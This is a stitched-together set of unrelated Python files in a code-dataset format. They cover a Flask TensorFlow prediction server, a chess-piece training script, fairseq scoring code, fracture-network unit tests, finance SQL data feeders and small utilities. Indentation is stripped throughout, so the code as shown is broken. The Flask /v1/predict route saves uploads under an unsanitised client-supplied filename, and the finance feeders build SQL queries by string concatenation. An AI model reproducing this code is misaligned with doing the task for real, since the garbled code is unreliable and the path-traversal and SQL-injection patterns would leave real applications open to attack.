if parent is None:
breadcrumb_list = []
else:
breadcrumb_list = [context['flatpage']]
while parent is not None:
breadcrumb_list.append(parent)
parent = parent.parent
breadcrumb_list.reverse()
context['breadcrumb_list'] = breadcrumb_list
return context
| 2.375 | 2 |
train.py | ronniechong/tensorflow-trainer | 0 | 6928 | <filename>train.py
from dotenv import load_dotenv
load_dotenv()
from flask import Flask, flash, request, redirect, url_for
from flask_ngrok import run_with_ngrok
from flask_cors import CORS
from werkzeug.utils import secure_filename
import tensorflow as tf
from tensorflow import keras
from tensorflow.keras.applications import vgg16
from tensorflow.keras import layers, models, Model, optimizers
from tensorflow.keras.preprocessing import image
import numpy as np
import os
import base64
ALLOWED_EXTENSIONS = {'txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif'}
app = Flask(__name__)
app.secret_key = os.getenv('SECRETKEY')
CORS(app)
# run_with_ngrok(app)
# https://github.com/gstaff/flask-ngrok/issues/2
category_names = os.getenv('CATEGORIES').split(',')
nb_categories = len(category_names)
type = os.getenv('MODE')
if type == 'checkpoint':
# Load via checkpoints
img_height, img_width = 200,200
conv_base = vgg16.VGG16(weights='imagenet', include_top=False, pooling='max', input_shape = (img_width, img_height, 3))
layers = [
conv_base,
layers.Dense(nb_categories, activation='softmax')
]
model = models.Sequential(layers)
model.load_weights('./model/cp2-0010.ckpt')
else:
# Load saved model
model = models.load_model('./model/model_vgg16.h5')
def allowed_file(filename):
return '.' in filename and \
filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS
@app.route('/')
def home():
return 'Nothing to see here'
@app.route('/v2/predict', methods=['POST'])
def predictFileUpload():
if request.method == 'POST':
print(request)
if 'file' not in request.files:
return {
'Error': 'No file part'
}
file = request.files['file']
if file.filename == '':
return {
'Error': 'No selected file'
}
if file and allowed_file(file.filename):
filename = secure_filename(file.filename)
file.save(os.path.join('./uploads', filename))
img_width, img_height = 200, 200
img = image.load_img(os.path.join('./uploads', filename), target_size = (img_width, img_height))
img = image.img_to_array(img)
img = np.expand_dims(img, axis = 0)
class_prob=model.predict(img)
y_pred = np.argmax(class_prob, axis=1)
count = 0
for a in class_prob[0]:
# print(category_names[count] + ': ' + "{:.2f}".format(a))
count = count + 1
return {
'filename': filename,
'prediction': category_names[y_pred[0]]
}
return 'nothing to see here'
@app.route('/v1/predict', methods=['POST'])
def predictBase64():
if request.method == 'POST':
data = request.get_json()
if data is None:
return {
'Error': 'No image'
}
else:
img_data = data['image']
filename = data['name']
with open(os.path.join('./uploads', filename), "wb") as fh:
fh.write(base64.decodebytes(img_data.encode()))
# fh.close()
img_width, img_height = 200, 200
img = image.load_img(os.path.join('./uploads', filename), target_size = (img_width, img_height))
img = image.img_to_array(img)
img = np.expand_dims(img, axis = 0)
class_prob=model.predict(img)
y_pred = np.argmax(class_prob, axis=1)
count = 0;
for a in class_prob[0]:
# print(category_names[count] + ': ' + "{:.2f}".format(a))
count = count + 1
return {
'filename': filename,
'prediction': category_names[y_pred[0]]
}
return 'nothing to see here'
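# Example call against /v1/predict (illustrative client code; host, port and
# file name are assumptions):
#
#   import base64, requests
#   payload = {
#       "name": "board_square.jpg",
#       "image": base64.b64encode(open("board_square.jpg", "rb").read()).decode(),
#   }
#   r = requests.post("http://localhost:5000/v1/predict", json=payload)
#   r.json()  # -> {"filename": "board_square.jpg", "prediction": "<one of CATEGORIES>"}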
if __name__ == '__main__':
app.run(host='0.0.0.0') | 2.234375 | 2 |
src/models/train_model.py | sandorfoldi/chess_positions_recognition | 0 | 6929 | import random
import matplotlib.pyplot as plt
import wandb
import hydra
import torch
import torch.utils.data as data_utils
from model import ChessPiecePredictor
from torch import nn, optim
from google.cloud import storage
from torch.utils.data import DataLoader
from torchvision import transforms
from torchvision.datasets import ImageFolder
@hydra.main(config_path="../conf", config_name="config")
def train(cfg):
print(f"Training started with parameters: {cfg}")
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
wandb.init()
torch.manual_seed(cfg.seed)
model = ChessPiecePredictor(
image_size=cfg.image_size,
patch_size=cfg.patch_size,
in_channels=cfg.in_channels,
embed_dim=cfg.embed_dim,
num_heads=cfg.num_heads,
)
wandb.watch(model)
t = transforms.Compose(
[
transforms.Resize((cfg.image_size, cfg.image_size)),
transforms.Grayscale(num_output_channels=cfg.in_channels),
transforms.ToTensor(),
]
)
train_data = ImageFolder(f"{cfg.data_path}/train", transform=t)
validation_data = ImageFolder(f"{cfg.data_path}/test", transform=t)
indices_train = random.sample(range(1, 60000), 5000)
indices_valid = random.sample(range(1, 30000), 1000)
train_data = data_utils.Subset(train_data, indices_train)
validation_data = data_utils.Subset(validation_data, indices_valid)
train_loader = DataLoader(train_data, batch_size=cfg.batch_size, shuffle=True)
validation_loader = DataLoader(validation_data, batch_size=cfg.batch_size, shuffle=True)
criterion = nn.CrossEntropyLoss()
optimizer = optim.Adam(model.parameters(), lr=cfg.lr)
print("Training started...")
train_losses = []
validation_losses = []
batch_count = len(train_loader)
epochs = 2
for e in range(epochs):
train_loss = 0
train_correct = 0
validation_loss = 0
validation_correct = 0
i = 0
for images, labels in train_loader:
# in case we use cuda to train on gpu
images = images.to(device)
labels = labels.to(device)
optimizer.zero_grad()
preds = model(images)
loss = criterion(preds, labels)
loss.backward()
optimizer.step()
train_loss += loss.item()
# accuracy
_, preds_indices = torch.max(preds, dim=1)
train_correct += (preds_indices == labels).sum()
i += 1
if i % 100 == 0:
print(
f"Epoch: {e+1} / {epochs}"
f" - progress: {i} / {batch_count}"
f" - loss: {loss.data.mean()}"
)
for images, labels in validation_loader:
images = images.to(device)
labels = labels.to(device)
preds = model(images)
loss = criterion(preds, labels)
validation_loss += loss.item()
# accuracy
_, preds_indices = torch.max(preds, dim=1)
validation_correct += (preds_indices == labels).sum()
train_accuracy = float(train_correct / (len(train_loader) * cfg.batch_size))
validation_accuracy = float(validation_correct / (len(validation_loader) * cfg.batch_size))
wandb.log({
"train_loss": train_loss,
"validation_loss": validation_loss,
"train_accuracy": train_accuracy,
"validation_accuracy": validation_accuracy,
})
train_losses.append(train_loss / len(train_loader))
validation_losses.append(validation_loss / len(validation_loader))
# plotting
plt.plot(list(range(1, len(train_losses) + 1)), train_losses, label="Training loss")
print("Train losses:", train_losses)
plt.plot(list(range(1, len(validation_losses) + 1)), validation_losses, label="Validation loss")
print("Validation losses:", validation_losses)
plt.xlabel("epoch")
plt.ylabel("loss")
plt.legend()
fig_path = "training_run.png"
plt.savefig(fig_path)
print(f"Saved training loss figure to {fig_path}")
model_path = "trained_model.pth"
torch.save(model.state_dict(), model_path)
print(f"Saved trained model to {model_path}")
storage_client = storage.Client()
bucket = storage_client.bucket("chess_predictor")
blob = bucket.blob("model_blob")
    blob.upload_from_filename(model_path)
if __name__ == "__main__":
train()
| 2.234375 | 2 |
fairseq/scoring/__init__.py | fairseq-FT/fairseq | 33 | 6930 | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import importlib
import os
from abc import ABC, abstractmethod
from fairseq import registry
from omegaconf import DictConfig
class BaseScorer(ABC):
def __init__(self, cfg):
self.cfg = cfg
self.ref = []
self.pred = []
def add_string(self, ref, pred):
self.ref.append(ref)
self.pred.append(pred)
@abstractmethod
def score(self) -> float:
pass
@abstractmethod
def result_string(self) -> str:
pass
_build_scorer, register_scorer, SCORER_REGISTRY, _ = registry.setup_registry(
"--scoring", default="bleu"
)
def build_scorer(choice, tgt_dict):
if isinstance(choice, DictConfig):
choice = choice._name
if choice == "bleu":
from fairseq.scoring import bleu
return bleu.Scorer(
bleu.BleuConfig(pad=tgt_dict.pad(), eos=tgt_dict.eos(), unk=tgt_dict.unk())
)
return _build_scorer(choice)
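# Usage sketch (hedged: assumes a string-based scorer such as "chrf" is
# registered via @register_scorer in this fairseq version; such scorers expose
# the BaseScorer API defined above):
#
#   scorer = build_scorer("chrf", tgt_dict)
#   scorer.add_string("a reference sentence", "a hypothesis sentence")
#   print(scorer.score(), scorer.result_string())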
# automatically import any Python files in the current directory
for file in os.listdir(os.path.dirname(__file__)):
if file.endswith(".py") and not file.startswith("_"):
module = file[: file.find(".py")]
importlib.import_module("fairseq.scoring." + module)
| 2.234375 | 2 |
dfn/tests/test_FractureNetworkThermal.py | richardhaslam/discrete-fracture-network | 1 | 6931 | import copy
import unittest
import networkx as nx
import numpy as np
from scipy.special import erf
from dfn import Fluid, FractureNetworkThermal
class TestFractureNetworkThermal(unittest.TestCase):
def __init__(self, *args, **kwargs):
super(TestFractureNetworkThermal, self).__init__(*args, **kwargs)
# fluid properties
cp_w = 4300.0
rho_w = 1000.0
mu_w = 1E-3
self.fluid = Fluid(density=rho_w, viscosity=mu_w, heat_capacity=cp_w)
# reservoir properties
k_r = 2.9
cp_r = 1050.0
rho_r = 2700.0
alpha_r = k_r / (rho_r * cp_r)
# first network
conn_1 = [(0, 1), (1, 2), (1, 3), (2, 4), (3, 4), (4, 5)]
L_1 = [100, 500, 500, 500, 500, 100]
H_1 = [500, 500, 500, 500, 500, 500]
w_1 = [1E-3, 1E-3, 1E-3, 1E-3, 1E-3, 1E-3]
self.network_1 = FractureNetworkThermal(conn_1, L_1, H_1, w_1, k_r,
alpha_r)
# second network
conn_2 = [(0, 1), (1, 2), (2, 3), (1, 4), (2, 5), (3, 6), (4, 5),
(5, 6), (4, 7), (5, 8), (6, 9), (7, 8), (8, 9), (9, 10)]
L_2 = 250 * np.ones(len(conn_2))
L_2[0] = 100
L_2[-1] = 100
H_2 = 500 * np.ones(len(conn_2))
w_2 = 1E-3 * np.ones(len(conn_2))
self.network_2 = FractureNetworkThermal(conn_2, L_2, H_2, w_2, k_r,
alpha_r)
def copy_networks(self):
"""Return a copy of the fracture networks."""
return copy.copy(self.network_1), copy.copy(self.network_2)
def networks_with_flow(self):
"""Return networks with the mass flow calculated."""
network_1, network_2 = self.copy_networks()
P_0 = 0.0
m_inj = 50.0
network_1.calculate_flow(self.fluid, {0: P_0}, {5: -m_inj})
network_2.calculate_flow(self.fluid, {0: P_0}, {10: -m_inj})
return network_1, network_2
def reverse_nodes(self, network, segments):
"""Reverse the node order for given segments."""
conn = network.connectivity
for seg in segments:
inlet, outlet = conn[seg]
conn[seg, :] = outlet, inlet
network.connectivity = conn
return network
def test_no_mass_flow(self):
"""Test if TypeError is raised for networks without flow calculated."""
with self.assertRaises(TypeError):
self.network_1._check_if_calculated()
with self.assertRaises(TypeError):
self.network_2._check_if_calculated()
def test_neg_mass_flow(self):
"""Test if valueError is raised for networks with negative flow."""
network_1, network_2 = self.networks_with_flow()
network_1 = self.reverse_nodes(network_1, [1])
network_2 = self.reverse_nodes(network_2, [1])
network_1.calculate_flow(self.fluid, {0: 0}, {5: -1.0})
network_2.calculate_flow(self.fluid, {0: 0}, {10: -1.0})
with self.assertRaises(ValueError):
network_1.calculate_temperature(self.fluid, 0, [0], [1])
with self.assertRaises(ValueError):
network_2.calculate_temperature(self.fluid, 0, [0], [1])
def test_construct_graph(self):
"""Test _construct_graph method."""
network_1, network_2 = self.networks_with_flow()
network_1._construct_graph()
network_2._construct_graph()
# construct graph for network 1
G_1 = nx.MultiDiGraph()
edge_data_1 = [(0, 1, {'index': 0}), (1, 2, {'index': 1}),
(1, 3, {'index': 2}), (2, 4, {'index': 3}),
(3, 4, {'index': 4}), (4, 5, {'index': 5})]
G_1.add_edges_from(edge_data_1)
# construct graph for network 2
G_2 = nx.MultiDiGraph()
edge_data_2 = [(0, 1, {'index': 0}), (1, 2, {'index': 1}),
(2, 3, {'index': 2}), (1, 4, {'index': 3}),
(2, 5, {'index': 4}), (3, 6, {'index': 5}),
(4, 5, {'index': 6}), (5, 6, {'index': 7}),
(4, 7, {'index': 8}), (5, 8, {'index': 9}),
(6, 9, {'index': 10}), (7, 8, {'index': 11}),
(8, 9, {'index': 12}), (9, 10, {'index': 13})]
G_2.add_edges_from(edge_data_2)
# return True if graphs are the same
is_isomorphic_1 = nx.is_isomorphic(network_1.graph, G_1)
is_isomorphic_2 = nx.is_isomorphic(network_2.graph, G_2)
self.assertTrue(is_isomorphic_1)
self.assertTrue(is_isomorphic_2)
def test_find_injection_nodes(self):
"""Test _find_injection_nodes method."""
network_1, network_2 = self.networks_with_flow()
network_1._construct_graph()
network_2._construct_graph()
self.assertEqual(network_1._find_injection_nodes(), [0])
self.assertEqual(network_2._find_injection_nodes(), [0])
def test_mass_contribution(self):
"""Test _mass_contribution method."""
network_1, network_2 = self.networks_with_flow()
chi_1 = network_1._mass_contribution()
chi_2 = network_2._mass_contribution()
# first network
for i in (0, 1, 2, 5):
self.assertAlmostEqual(chi_1[i], 1.0, 12)
self.assertAlmostEqual(chi_1[3] + chi_1[4], 1.0, 12)
# second network
for i in (0, 1, 2, 3, 8, 13):
self.assertAlmostEqual(chi_2[i], 1.0, 12)
for i, j in [(4, 6), (5, 7), (9, 11), (10, 12)]:
self.assertAlmostEqual(chi_2[i] + chi_2[j], 1.0, 12)
def test_find_paths(self):
"""Test find_paths method."""
# .find_paths method calls .construct_graph if needed. Manually call
# .construct_graph() on one network for testing both True and False
# conditions
network_1, network_2 = self.networks_with_flow()
network_1._construct_graph()
path_1 = {(0, 1, 3), (0, 2, 4)}
path_2 = {(0, 1, 2, 5, 10), (0, 1, 4, 7, 10), (0, 3, 6, 7, 10),
(0, 3, 6, 9, 12), (0, 3, 8, 11, 12), (0, 1, 4, 9, 12)}
self.assertEqual(path_1, set(network_1.find_paths(0, 4)))
self.assertEqual(path_2, set(network_2.find_paths(0, 9)))
def test_calculate_temperature_inlet_segment(self):
"""Test calculate_temperature ability to handle the inlet segment."""
# operational parameters for temperature
t_end = 86400 * 365.25 * 20
time = t_end * np.linspace(1.0 / 100, 1.0, 100)
distance = np.linspace(0.0, 100.0, 100)
z, t = np.meshgrid(distance, time)
network_1, network_2 = self.networks_with_flow()
# create parameters for temperature manually
m_1 = network_1.mass_flow[0]
m_2 = network_2.mass_flow[0]
beta_1 = 2 * network_1.thermal_cond * network_1.thickness[0] / \
(m_1 * network_1.fluid.c_f)
beta_2 = 2 * network_2.thermal_cond * network_2.thickness[0] / \
(m_2 * network_2.fluid.c_f)
xi_1 = beta_1 * z / (2 * np.sqrt(network_1.thermal_diff * t))
xi_2 = beta_2 * z / (2 * np.sqrt(network_2.thermal_diff * t))
Theta_1 = erf(xi_1)
Theta_2 = erf(xi_2)
# difference between manual and automatic construction
diff_1 = Theta_1 - network_1.calculate_temperature(self.fluid, 0,
distance, time)
diff_2 = Theta_2 - network_2.calculate_temperature(self.fluid, 0,
distance, time)
self.assertAlmostEqual((diff_1**2).sum() / (Theta_1**2).sum(), 0, 12)
self.assertAlmostEqual((diff_2**2).sum() / (Theta_2**2).sum(), 0, 12)
def test_calculate_temperature(self):
"""Test calculate_temperature by constructing manual the equations."""
# operational parameters for temperature
t_end = 86400 * 365.25 * 20
time = t_end * np.linspace(1.0 / 100, 1.0, 100)
distance = np.linspace(0.0, 100.0, 100)
z, t = np.meshgrid(distance, time)
network_1, network_2 = self.networks_with_flow()
# create parameters for temperature manually
chi_1 = np.array([1.0, 1.0, 1.0, 0.5, 0.5, 1.0])
chi_2 = np.ones(network_2.n_segments)
chi_2[4:8] = 0.5
chi_2[9:13] = 0.5
m_1 = network_1.mass_flow
m_2 = network_2.mass_flow
beta_1 = 2 * network_1.thermal_cond * network_1.thickness / \
(m_1 * network_1.fluid.c_f)
beta_2 = 2 * network_2.thermal_cond * network_2.thickness / \
(m_2 * network_2.fluid.c_f)
xi_1 = np.einsum('i,jk->ijk', beta_1 * network_1.length,
1 / (2 * np.sqrt(network_1.thermal_diff * t)))
xi_2 = np.einsum('i,jk->ijk', beta_2 * network_2.length,
1 / (2 * np.sqrt(network_2.thermal_diff * t)))
a = xi_1[[0, 2, 4], :, :].sum(axis=0)
b = xi_1[[0, 1, 3], :, :].sum(axis=0)
xi_seg = beta_1[-1] * z / (2 * np.sqrt(network_1.thermal_diff * t))
Theta_1 = chi_1[0] * chi_1[2] * chi_1[4] * erf(a + xi_seg) + \
chi_1[0] * chi_1[1] * chi_1[3] * erf(b + xi_seg)
a = xi_2[[0, 1, 2, 5, 10], :, :].sum(axis=0)
b = xi_2[[0, 1, 4, 7, 10], :, :].sum(axis=0)
c = xi_2[[0, 3, 6, 7, 10], :, :].sum(axis=0)
d = xi_2[[0, 3, 6, 9, 12], :, :].sum(axis=0)
e = xi_2[[0, 3, 8, 11, 12], :, :].sum(axis=0)
f = xi_2[[0, 1, 4, 9, 12], :, :].sum(axis=0)
C_1 = chi_2[0] * chi_2[1] * chi_2[2] * chi_2[5] * chi_2[10]
C_2 = chi_2[0] * chi_2[1] * chi_2[4] * chi_2[7] * chi_2[10]
C_3 = chi_2[0] * chi_2[3] * chi_2[6] * chi_2[7] * chi_2[10]
C_4 = chi_2[0] * chi_2[3] * chi_2[6] * chi_2[9] * chi_2[12]
C_5 = chi_2[0] * chi_2[3] * chi_2[8] * chi_2[11] * chi_2[12]
C_6 = chi_2[0] * chi_2[1] * chi_2[4] * chi_2[9] * chi_2[12]
xi_seg = beta_2[-1] * z / (2 * np.sqrt(network_2.thermal_diff * t))
Theta_2 = C_1 * erf(a + xi_seg) + C_2 * erf(b + xi_seg) + \
C_3 * erf(c + xi_seg) + C_4 * erf(d + xi_seg) + \
C_5 * erf(e + xi_seg) + C_6 * erf(f + xi_seg)
# difference between manual and automatic construction
diff_1 = Theta_1 - network_1.calculate_temperature(self.fluid, 5,
distance, time)
diff_2 = Theta_2 - network_2.calculate_temperature(self.fluid, 13,
distance, time)
self.assertAlmostEqual((diff_1**2).sum() / (Theta_1**2).sum(), 0, 12)
self.assertAlmostEqual((diff_2**2).sum() / (Theta_2**2).sum(), 0, 12)
if __name__ == '__main__':
unittest.main()
| 2.390625 | 2 |
dataapi/AWS/getawsdata.py | gusamarante/Quantequim | 296 | 6932 | """
Author: <NAME>
"""
import numpy as np
import pandas as pd
from datetime import datetime
class TrackerFeeder(object):
"""
Feeder for the trackers of the FinanceHub database.
"""
def __init__(self, db_connect):
"""
Feeder construction
:param db_connect: sql connection engine from sqlalchemy
"""
self.conn = db_connect.connection
def fetch(self, fh_ticker):
"""
        Grabs trackers from the FH database.
:param fh_ticker: str or list with the tickers from the database trackers
:return: pandas DataFrame with tickers on the columns
"""
assert type(fh_ticker) is str or type(fh_ticker) is list or type(fh_ticker) is dict, \
"'tickers' must be a string, list or dict"
sql_query = 'SELECT time_stamp, fh_ticker, value FROM "trackers" WHERE '
if type(fh_ticker) is str:
sql_query = sql_query + "fh_ticker IN ('" + fh_ticker + "')"
elif type(fh_ticker) is list:
sql_query = sql_query + "fh_ticker IN ('" + "', '".join(fh_ticker) + "')"
elif type(fh_ticker) is dict:
sql_query = sql_query + "fh_ticker IN ('" + "', '".join(list(fh_ticker.keys())) + "')"
df = pd.read_sql(sql=sql_query, con=self.conn)
df = df.pivot(index='time_stamp', columns='fh_ticker', values='value')
if type(fh_ticker) is dict:
df = df.rename(fh_ticker, axis=1)
df.index = pd.to_datetime(df.index)
df = df.dropna(how='all')
df = df.sort_index()
return df
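    # Usage sketch (ticker names are hypothetical -- fetch_metadata() below
    # lists the real ones; db_connect is the sqlalchemy engine wrapper expected
    # by __init__):
    #
    #   feeder = TrackerFeeder(db_connect)
    #   df = feeder.fetch(['eqs br ibov', 'eqs us spx'])   # list of tickers
    #   df = feeder.fetch({'eqs br ibov': 'Ibovespa'})     # dict renames columns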
def fetch_metadata(self):
"""
Returns the full metadata table of the FH trackers, which is useful to do custom filters and look at what
is in the database.
:return: pandas Dataframe
"""
sql_query = 'SELECT * FROM "trackers_description"'
df = pd.read_sql(sql=sql_query, con=self.conn)
return df
def filter_fetch(self, filter_dict, ret='series'):
"""
Grabs the trackers from the FH database that satisfy the criteria given by 'filter_dict'.
:param filter_dict: dict. Keys must be column names from the metadata table. Values must be
either str or list of str
        :param ret: If 'series', returns a DataFrame with the tracker series that satisfy the conditions.
                    If 'tickers', returns a list of the tickers that satisfy the conditions.
:return: list or pandas DataFrame
"""
assert type(filter_dict) is dict, "'filter_dict' must be a dict"
assert len(filter_dict) > 0, "'filter_dict' is empty"
        assert ret.lower() in ['series', 'tickers'], "'ret' must be either 'series' or 'tickers'"
desc_query = 'SELECT fh_ticker FROM trackers_description WHERE '
for col in filter_dict.keys():
if type(filter_dict[col]) is list:
desc_query = desc_query + col + " IN ('" + "', '".join(filter_dict[col]) + "')"
else:
desc_query = desc_query + col + f" IN ('{filter_dict[col]}')"
desc_query = desc_query + ' and '
desc_query = desc_query[:-5]
df = pd.read_sql(sql=desc_query, con=self.conn)
tickers = df.values.flatten().tolist()
if ret == 'tickers':
return tickers
df = self.fetch(tickers)
return df
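    # Example filter (column names and values are hypothetical -- see
    # filter_parameters() for the real options):
    #
    #   tickers = feeder.filter_fetch({'asset_class': 'equity',
    #                                  'country': ['US', 'BR']}, ret='tickers')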
def filter_parameters(self):
"""
Grabs the possible columns and their respective unique values from the metadata table.
:return: dict. Keys are the column names, values are list of unique values of the column.
"""
df = self.fetch_metadata()
param_dict = {}
for col in df.columns:
param_dict[col] = df[col].unique().tolist()
return param_dict
def fetch_everything(self):
sql_query = 'SELECT time_stamp, fh_ticker, value FROM "trackers"'
df = pd.read_sql(sql=sql_query, con=self.conn)
df = df.pivot(index='time_stamp', columns='fh_ticker', values='value')
df.index = pd.to_datetime(df.index)
df = df.dropna(how='all')
df = df.sort_index()
return df
class FocusFeeder(object):
def __init__(self, db_connect):
"""
Feeder construction
:param db_connect: sql connection engine from sqlalchemy
"""
self.conn = db_connect.connection
def fetch(self, index='ipca', frequency='yearly', prediction_scope=None,
dt_ini=None, dt_end=None):
"""
        Grabs data from the database and pivots the results into a DataFrame. To ensure consistency, the function
        can only take one index and one frequency at a time. Only 'prediction_scope' can be a list.
        If no prediction scope is passed, all available prediction scopes are returned.
:param index: String containing the name of the index.
:param frequency: String. 'yearly', 'monthly' or 'quarterly' (availability depends on the index)
:param prediction_scope: string, float or list. Years that the forecasts are for.
:param dt_ini: string. Initial date for the series
:param dt_end: string. End date for the series
:return: pandas DataFrame with the pivoted data.
"""
# Error Checking
self._basic_assertions(index, frequency, prediction_scope)
# Handle formats
index, frequency, prediction_scope, dt_ini, dt_end, pivot \
= self._map_inputs(index, frequency, prediction_scope, dt_ini, dt_end)
# build sql query
sql_query = self._build_sql_query(index, frequency, prediction_scope, dt_ini, dt_end)
# get data
df = pd.read_sql(sql=sql_query, con=self.conn)
df = df.drop_duplicates()
# pivoting
df = df.pivot(index='date', columns=pivot, values='value')
df.index = pd.to_datetime(df.index)
return df
def years_ahead(self, index='IPCA', years=1, dt_ini=None, dt_end=None):
"""
        The metric attribute is set to 'mean' by default because further projections change smoothly
"""
# Error checking
self._basic_assertions_years_ahead(index, years)
# Handle formats
index, dt_ini, dt_end = self._map_inputs_years_ahead(index, dt_ini, dt_end)
# grabs the index for all available years for each date
df = self.fetch(index=index, frequency='yearly', prediction_scope=None,
dt_ini=dt_ini, dt_end=dt_end)
# creates the new dataframe
df_weighted = pd.DataFrame(index=df.index)
df_weighted[index + ' ' + str(years) + ' year ahead'] = np.nan
# days until year end
df_weighted['D2YE'] = ((df_weighted.index + pd.offsets.YearEnd()) -
pd.to_datetime(df_weighted.index.tolist())).days
for ind in df_weighted.index:
if ind.day == 31 and ind.month == 12:
df_weighted.loc[ind, 'D2YE'] = 0
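        # Worked example (illustrative numbers): for a date with D2YE = 100 days left to year end
        # and years = 1, the blended forecast computed below is
        #     (forecast_for_current_year * 100 + forecast_for_next_year * 265) / 365,
        # i.e. the current-year forecast is phased out as the year end approaches.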
# loops on each date
for date in df_weighted.index:
df_weighted.loc[date, index + ' ' + str(years) + ' year ahead'] = \
(df.loc[date, str(date.year + years - 1)] * df_weighted.loc[date, 'D2YE'] +
df.loc[date, str(date.year + years)] * (365 - df_weighted.loc[date, 'D2YE'])) / 365
df = df_weighted[[index + ' ' + str(years) + ' year ahead']].interpolate()
df.index = pd.to_datetime(df.index)
return df
@staticmethod
def _basic_assertions(index, frequency, prediction_scope):
"""Check basic assertions"""
assert type(index) is str, 'index must be a string'
assert type(frequency) is str, 'frequency must be a string'
@staticmethod
def _map_inputs(index, frequency, prediction_scope, dt_ini, dt_end):
"""Handle formats of the inputs"""
# index
if type(index) is str:
index = index.lower()
elif type(index) is list:
index = [x.lower() for x in index]
# frequency
frequency = frequency.lower()
# prediction_scope
if type(prediction_scope) is str:
prediction_scope = prediction_scope.lower()
elif type(prediction_scope) is list:
prediction_scope = [str(x).lower() for x in prediction_scope]
elif prediction_scope is None:
prediction_scope = None
else:
prediction_scope = str(prediction_scope).lower()
# dates
if dt_ini is None:
dt_ini = '1900-01-01'
if dt_end is None:
dt_end = datetime.now().strftime('%Y-%m-%d')
        # pivot variable (while we have no metrics, it's always the prediction scope)
pivot = 'prediction_scope'
return index, frequency, prediction_scope, dt_ini, dt_end, pivot
@staticmethod
def _build_sql_query(index, frequency, prediction_scope, dt_ini, dt_end):
sql_query = 'SELECT DATE, VALUE, PREDICTION_SCOPE FROM "focus_survey" WHERE '
# index (must not be None)
if type(index) is str:
sql_query = sql_query + "lower(INDEX) IN ('" + index + "')"
elif type(index) is list:
sql_query = sql_query + "lower(INDEX) IN ('" + "', '".join(index) + "')"
# frequency
if type(frequency) is str:
sql_query = sql_query + " AND lower(FREQUENCY) IN ('" + frequency + "')"
elif type(frequency) is list:
sql_query = sql_query + " AND lower(FREQUENCY) IN ('" + "', '".join(frequency) + "')"
# prediction scope
if type(prediction_scope) is str:
sql_query = sql_query + " AND lower(PREDICTION_SCOPE) IN ('" + prediction_scope + "')"
elif type(prediction_scope) is list:
sql_query = sql_query + " AND lower(PREDICTION_SCOPE) IN ('" + "', '".join(prediction_scope) + "')"
sql_query = sql_query + " AND DATE BETWEEN '" + dt_ini + "' AND '" + dt_end + "'"
sql_query = sql_query + ' ORDER BY DATE;'
return sql_query
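    # Illustrative example of a query produced by _build_sql_query (index and dates are made up):
    # SELECT DATE, VALUE, PREDICTION_SCOPE FROM "focus_survey" WHERE lower(INDEX) IN ('ipca')
    #     AND lower(FREQUENCY) IN ('yearly') AND DATE BETWEEN '1900-01-01' AND '2021-12-31' ORDER BY DATE;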
@staticmethod
def _basic_assertions_years_ahead(index, years):
"""Check basic assertions"""
assert type(index) is str, 'index must be a string'
        assert (type(years) is int) and (years <= 4), 'number of years must be an integer between 1 and 4'
@staticmethod
def _map_inputs_years_ahead(index, dt_ini, dt_end):
"""Handles the format of the inputs of the years_ahead method"""
index = index.lower()
# dates
if dt_ini is None:
dt_ini = '1900-01-01'
if dt_end is None:
dt_end = datetime.now().strftime('%Y-%m-%d')
return index, dt_ini, dt_end
| 3.140625 | 3 |
assets/utils/config.py | mklew/quickstart-data-lake-qubole | 0 | 6933 | <reponame>mklew/quickstart-data-lake-qubole<filename>assets/utils/config.py
from configparser import ConfigParser
CONFIG_INT_KEYS = {
'hadoop_max_nodes_count',
'hadoop_ebs_volumes_count',
'hadoop_ebs_volume_size',
'spark_max_nodes_count',
'spark_ebs_volumes_count',
'spark_ebs_volume_size'
}
def read_config(config_path):
parser = ConfigParser()
parser.read(config_path)
config = {}
for section in parser.sections():
for (config_key, config_value) in parser.items(section):
config[config_key] = int(config_value) if config_key in CONFIG_INT_KEYS else config_value
return config
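# Example usage (illustrative file and keys; ConfigParser sections are flattened into one dict):
#
#   [cluster]
#   hadoop_max_nodes_count = 10
#   qubole_api_token = <token>
#
#   config = read_config('quickstart.ini')
#   config['hadoop_max_nodes_count']  # -> 10 as int, because the key is listed in CONFIG_INT_KEYS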
| 2.421875 | 2 |
app/blueprints/admin_api/__init__.py | lvyaoo/api-demo | 0 | 6934 | <gh_stars>0
from flask import Blueprint
from .hooks import admin_auth
from ...api_utils import *
bp_admin_api = Blueprint('bp_admin_api', __name__)
bp_admin_api.register_error_handler(APIError, handle_api_error)
bp_admin_api.register_error_handler(500, handle_500_error)
bp_admin_api.register_error_handler(400, handle_400_error)
bp_admin_api.register_error_handler(401, handle_401_error)
bp_admin_api.register_error_handler(403, handle_403_error)
bp_admin_api.register_error_handler(404, handle_404_error)
bp_admin_api.before_request(before_api_request)
bp_admin_api.before_request(admin_auth)
from . import v_admin
| 1.796875 | 2 |
project/starter_code/student_utils.py | nihaagarwalla/nd320-c1-emr-data-starter | 0 | 6935 | <reponame>nihaagarwalla/nd320-c1-emr-data-starter<filename>project/starter_code/student_utils.py
import pandas as pd
import numpy as np
import os
import tensorflow as tf
import functools
####### STUDENTS FILL THIS OUT ######
#Question 3
def reduce_dimension_ndc(df, ndc_df):
'''
df: pandas dataframe, input dataset
ndc_df: pandas dataframe, drug code dataset used for mapping in generic names
return:
df: pandas dataframe, output dataframe with joined generic drug name
'''
ndc_df["Non-proprietary Name"]= ndc_df["Non-proprietary Name"].str.replace("Hcl", "Hydrochloride")
ndc_df["Non-proprietary Name"]= ndc_df["Non-proprietary Name"].str.replace(" And ", "-")
ndc_df["Non-proprietary Name"]= (ndc_df["Non-proprietary Name"].str.strip()).str.upper()
# ndc_df["Dosage Form"]= ndc_df["Dosage Form"].str.replace("Tablet, Film Coated", "TABLET")
# ndc_df["Dosage Form"]= ndc_df["Dosage Form"].str.replace("Tablet, Coated", "TABLET")
# ndc_df["Dosage Form"]= ndc_df["Dosage Form"].str.replace("Tablet, Film Coated, Extended Release", "Tablet Extended Release")
# ndc_df["Dosage Form"]= ndc_df["Dosage Form"].str.replace("Tablet, Extended Release", "Tablet Extended Release")
# ndc_df["Dosage Form"]= ndc_df["Dosage Form"].str.replace("For Suspension, Extended Release", "For Suspension Extended Release")
# ndc_df["Dosage Form"]= ndc_df["Dosage Form"].str.replace("Powder, Metered", "Powder Metered")
